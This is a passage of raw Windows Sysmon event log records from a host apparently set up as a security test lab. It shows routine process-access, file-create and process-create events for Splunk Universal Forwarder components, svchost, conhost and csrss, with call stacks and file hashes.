AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F88490C0A302BAA0F7190E4BE5F0FC9,SHA256=FBCB2353D148D22DA090A3B7ABBA59C0EC857990A0A736371850BEF32550DC56,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214715Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:45.756{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214714Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:45.647{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0EF1-6216-0B04-000000003902}2316C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214713Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:45.647{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214712Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:45.647{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214711Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:45.647{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214710Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:45.647{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214709Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:45.647{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214708Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:45.647{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214707Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:45.647{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214706Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:45.647{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214705Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:45.647{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214704Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:45.647{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-0EF1-6216-0B04-000000003902}2316C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214703Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:45.647{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0EF1-6216-0B04-000000003902}2316C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214702Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:45.648{4F8D34B0-0EF1-6216-0B04-000000003902}2316C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000214701Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:45.430{4F8D34B0-0EF1-6216-0A04-000000003902}20683136C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214700Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:45.147{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0EF1-6216-0A04-000000003902}2068C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214699Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:45.147{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214698Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:45.147{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214697Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:45.147{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214696Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:45.147{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214695Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:45.147{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214694Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:45.147{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214693Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:45.147{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214692Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:45.147{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214691Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:45.147{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214690Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:45.147{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-0EF1-6216-0A04-000000003902}2068C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214689Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:45.147{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0EF1-6216-0A04-000000003902}2068C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 